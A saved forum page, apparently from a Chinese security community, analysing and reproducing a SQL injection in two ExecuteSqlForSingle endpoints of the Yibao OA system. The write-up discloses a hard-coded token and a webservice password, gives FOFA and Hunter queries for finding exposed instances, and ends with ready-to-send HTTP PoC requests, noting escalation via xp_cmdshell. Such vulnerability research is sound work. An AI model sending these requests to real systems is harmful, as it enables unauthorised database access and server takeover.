ptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLR
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-name,.hljs-tag{color:#00f}.hljs-string{color:#a31515}.hljs-attr{color:red}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body code{border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre>code{word-break:normal;white-space:pre;background:transparent}.markdown-body pre{padding:16px;overflow:auto;font-size:85%;line-height:1.45;background-color:var(--color-canvas-subtle);border-radius:6px}.mark
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:tra
<body>
<div class="global-nav mb-50">
 <nav class="navbar navbar-inverse navbar-fixed-top">
 <div class="container nav">
 <div class="visible-xs header-response sf-hidden">
 
 
 
 
 </div>
 <div class="row hidden-xs">
 <div class="col-sm-9 col-md-9 col-lg-9">
 <div class=navbar-header>
 <button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
 
 
 
 
 </button>
 <div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
 </div>
 <div class="collapse navbar-collapse" id=global-navbar>
 <ul class="nav navbar-nav">
 <li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
 
 
 
 <li><a href=https://forum.butian.net/questions>问答</a></li>
 
 
 
 <li><a href=https://forum.butian.net/shop>商城</a></li>
 
 <li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
 <li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
 <span class=hot>NEW</span>
 </li>
 <li><a href=https://forum.butian.net/movable>活动</a></li>
 <li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
 
 </li>
 </ul>
 <form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
 <span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
 <input type=text name=word id=searchBox class=form-control placeholder value>
 </form>
 </div>
 </div>
 
 </div>
 </div>
 </nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main" style=width:100%>
 <div class=widget-article>
 <h3 class="title word-wrap">易宝oa软件两处-ExecuteSqlForSingle注入分析与复现</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 最近，看到运营小姐姐发了篇某宝的ExecuteSqlForSingle注入漏洞，想着去分析一下，结果一下找到两个同名接口都存在注入。。。。
 </div>
 <textarea id=md_view_content style=display:none value='一、漏洞描述
------

此漏洞由于鉴权令牌硬编码，导致可直接在前台进行sql注入，支持堆叠注入，进而执行任意sql命令。导致数据库可被任意增删改查，甚至可以打开xp\_cmdshell，进而获取服务器权限

二、网络测绘
------

fofa：

```js
app="顶讯科技-易宝OA系统"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c3e25de80b6ba3f2f9a2a380d04499b7b606154e.png)

hunter:

```js
web.body="topvision_oaName"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4553dfca263bbdd042b6c267874e21ec834ddfa2.png)

三、漏洞分析
------

1、使用文件搜索工具在项目内搜索关键字ExecuteSqlForSingle  
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-91bceb660eac0153c9c6859027e0a50f5180d8f1.png)

2、搜出来\\manager\\bin\\TopVision.WebApi.XML 文件中，存在两处接口

```js
M:TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle(System.String,System.String,System.String)
M:TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle(System.String,System.String,System.String)
```

3、使用dnSpy工具反编译\\manager\\bin\\TopVision.WebApi.dll

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5d315da569daff72488c0493f9a6074fb8cdf5a6.png)

4、先看第一个接口TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-2397adadc8983223745cfc8d6241fca0480c78ca.png)

5、请求方式为post,入参token、sql、strParameters。第一步if (base.IsAuthorityCheck() \\== null)会先校验token，跟进IsAuthorityCheck方法查看，发现token硬编码为zxh：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-92f092f65656e80b916c993bcc2d44b3205a3d21.png)

6、回到ExecuteSqlForSingle方法，三个入参最终会走到SingleBase&amp;lt;systemService&amp;gt;.Instance.ExecuteSqlForSingle中，跟进看代码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e0b6555f2c87c7a32706658e9bf3eb7f5df183ea.png)

7、sql和strParameters会先走到GetExecuteSqlForStoreProcedure方法，跟进后，发现此方法必须要求sql字符以usp\_、Usp\_、USP\_开头，或者值为SCM\_SE\_GetSystemSalesTips，此处不符合注入条件：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-63ae7ac2cece7cda1ce25d4fea76e878a4707309.png)

8、回到第6步的代码，最终还会走到ExecuteScalarSQLToObject方法中，可控入参只有sql，为第二个形参，跟进看代码发现又直接传入ExecuteScalar方法，sql对应形参strSQL：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fe6fd6b2a565dc1e80574e67c5e1d290d0c2e941.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-24f824f67c7c4d500a32d8464a390e9c720103a4.png)

9、再次跟进代码,再次进入ExecuteScalar方法，参数传递为strSQL-&amp;gt;cmdText

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4dd581d1b1f81886474f88c6a85aa8576a08834c.png)

10、cmdText又会传入SqlHelper.PrepareCommand方法，

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e33442afaa85eea1f45135a7e26aee0f5315092.png)

11、最终回到第9步的 sqlCommand.ExecuteScalar进行sql执行：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-773d4205da91c8094a6a9f17bdad201459288618.png)

12、因此注入点即为参数sql处，可直接执行sql参数的值，poc如下：

```js
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
```

13、接着第二个接口TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-76219817e1ab40fe2fd0b46564c690e766728365.png)

14、首先会校验webservicePassword，进入GetWebServicePassword查看

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8e205c1f800799c68804e4772a5261ce0aed4395.png)

15、发现是从配置中读取WebServicePassword，于是打开web.config，搜索WebServicePassword值：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-59290925b7f4ded8126c15c795c55807ae922427.png)

16、三个参数会进入GetExecuteSqlForStoreProcedure方法，跟进查看代码，发现也有if校验sql的值，无用：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-47ec0e46cbefe2d1cfa06f94cf67485e6c2bd794.png)

17、回到15步代码，sql参数再次传入ExecuteScalarSQL方法：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dca2fa515824e992dfac9b9be752bdce3a1390bf.png)

18、而此方法正是 第9步的方法，开始步骤重合，后续分析同理，于是，第二个poc:

```js
POST /WebService/BasicService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ExecuteSqlForSingle"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ExecuteSqlForSingle xmlns="http://tempuri.org/">
      <sql>select @@version</sql>
      <strParameters></strParameters>
      <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
    </ExecuteSqlForSingle>
  </soap:Body>
</soap:Envelope>
```

四、漏洞复现
------

poc1:

```js
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9ca28ce3773e5d5187aee75cc55cc5392a3e3539.png)

poc2:

```js
POST /WebService/BasicService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ExecuteSqlForSingle"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ExecuteSqlForSingle xmlns="http://tempuri.org/">
      <sql>select @@version</sql>
      <strParameters></strParameters>
      <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
    </ExecuteSqlForSingle>
  </soap:Body>
</soap:Envelope>
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fe337dcbcd894a0b97dc8b4de224e47a8f4daa83.png)'>一、漏洞描述
------

此漏洞由于鉴权令牌硬编码，导致可直接在前台进行sql注入，支持堆叠注入，进而执行任意sql命令。导致数据库可被任意增删改查，甚至可以打开xp\_cmdshell，进而获取服务器权限

二、网络测绘
------

fofa：

```js
app="顶讯科技-易宝OA系统"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c3e25de80b6ba3f2f9a2a380d04499b7b606154e.png)

hunter:

```js
web.body="topvision_oaName"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4553dfca263bbdd042b6c267874e21ec834ddfa2.png)

三、漏洞分析
------

1、使用文件搜索工具在项目内搜索关键字ExecuteSqlForSingle  
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-91bceb660eac0153c9c6859027e0a50f5180d8f1.png)

2、搜出来\\manager\\bin\\TopVision.WebApi.XML 文件中，存在两处接口

```js
M:TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle(System.String,System.String,System.String)
M:TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle(System.String,System.String,System.String)
```

3、使用dnSpy工具反编译\\manager\\bin\\TopVision.WebApi.dll

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5d315da569daff72488c0493f9a6074fb8cdf5a6.png)

4、先看第一个接口TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-2397adadc8983223745cfc8d6241fca0480c78ca.png)

5、请求方式为post,入参token、sql、strParameters。第一步if (base.IsAuthorityCheck() \\== null)会先校验token，跟进IsAuthorityCheck方法查看，发现token硬编码为zxh：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-92f092f65656e80b916c993bcc2d44b3205a3d21.png)

6、回到ExecuteSqlForSingle方法，三个入参最终会走到SingleBase&amp;lt;systemService&amp;gt;.Instance.ExecuteSqlForSingle中，跟进看代码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e0b6555f2c87c7a32706658e9bf3eb7f5df183ea.png)

7、sql和strParameters会先走到GetExecuteSqlForStoreProcedure方法，跟进后，发现此方法必须要求sql字符以usp\_、Usp\_、USP\_开头，或者值为SCM\_SE\_GetSystemSalesTips，此处不符合注入条件：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-63ae7ac2cece7cda1ce25d4fea76e878a4707309.png)

8、回到第6步的代码，最终还会走到ExecuteScalarSQLToObject方法中，可控入参只有sql，为第二个形参，跟进看代码发现又直接传入ExecuteScalar方法，sql对应形参strSQL：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fe6fd6b2a565dc1e80574e67c5e1d290d0c2e941.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-24f824f67c7c4d500a32d8464a390e9c720103a4.png)

9、再次跟进代码,再次进入ExecuteScalar方法，参数传递为strSQL-&amp;gt;cmdText

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4dd581d1b1f81886474f88c6a85aa8576a08834c.png)

10、cmdText又会传入SqlHelper.PrepareCommand方法，

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e33442afaa85eea1f45135a7e26aee0f5315092.png)

11、最终回到第9步的 sqlCommand.ExecuteScalar进行sql执行：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-773d4205da91c8094a6a9f17bdad201459288618.png)

12、因此注入点即为参数sql处，可直接执行sql参数的值，poc如下：

```js
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
```

13、接着第二个接口TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-76219817e1ab40fe2fd0b46564c690e766728365.png)

14、首先会校验webservicePassword，进入GetWebServicePassword查看

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8e205c1f800799c68804e4772a5261ce0aed4395.png)

15、发现是从配置中读取WebServicePassword，于是打开web.config，搜索WebServicePassword值：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-59290925b7f4ded8126c15c795c55807ae922427.png)

16、三个参数会进入GetExecuteSqlForStoreProcedure方法，跟进查看代码，发现也有if校验sql的值，无用：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-47ec0e46cbefe2d1cfa06f94cf67485e6c2bd794.png)

17、回到15步代码，sql参数再次传入ExecuteScalarSQL方法：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dca2fa515824e992dfac9b9be752bdce3a1390bf.png)

18、而此方法正是 第9步的方法，开始步骤重合，后续分析同理，于是，第二个poc:

```js
POST /WebService/BasicService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ExecuteSqlForSingle"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
  &lt;soap:Body&gt;
    &lt;ExecuteSqlForSingle xmlns="http://tempuri.org/"&gt;
      &lt;sql&gt;select @@version&lt;/sql&gt;
      &lt;strParameters&gt;&lt;/strParameters&gt;
      &lt;webservicePassword&gt;{ac80457b-368d-4062-b2dd-ae4d490e1c4b}&lt;/webservicePassword&gt;
    &lt;/ExecuteSqlForSingle&gt;
  &lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;
```

四、漏洞复现
------

poc1:

```js
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9ca28ce3773e5d5187aee75cc55cc5392a3e3539.png)

poc2:

```js
POST /WebService/BasicService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ExecuteSqlForSingle"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
  &lt;soap:Body&gt;
    &lt;ExecuteSqlForSingle xmlns="http://tempuri.org/"&gt;
      &lt;sql&gt;select @@version&lt;/sql&gt;
      &lt;strParameters&gt;&lt;/strParameters&gt;
      &lt;webservicePassword&gt;{ac80457b-368d-4062-b2dd-ae4d490e1c4b}&lt;/webservicePassword&gt;
    &lt;/ExecuteSqlForSingle&gt;
  &lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fe337dcbcd894a0b97dc8b4de224e47a8f4daa83.png)</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><h2 blockindex=0>一、漏洞描述</h2>
<p blockindex=1>此漏洞由于鉴权令牌硬编码，导致可直接在前台进行sql注入，支持堆叠注入，进而执行任意sql命令。导致数据库可被任意增删改查，甚至可以打开xp_cmdshell，进而获取服务器权限</p>
<h2 blockindex=2>二、网络测绘</h2>
<p blockindex=3>fofa：</p>
<pre blockindex=4><code class="hljs language-js">app=<span class=hljs-string>"顶讯科技-易宝OA系统"</span>
</code></pre>
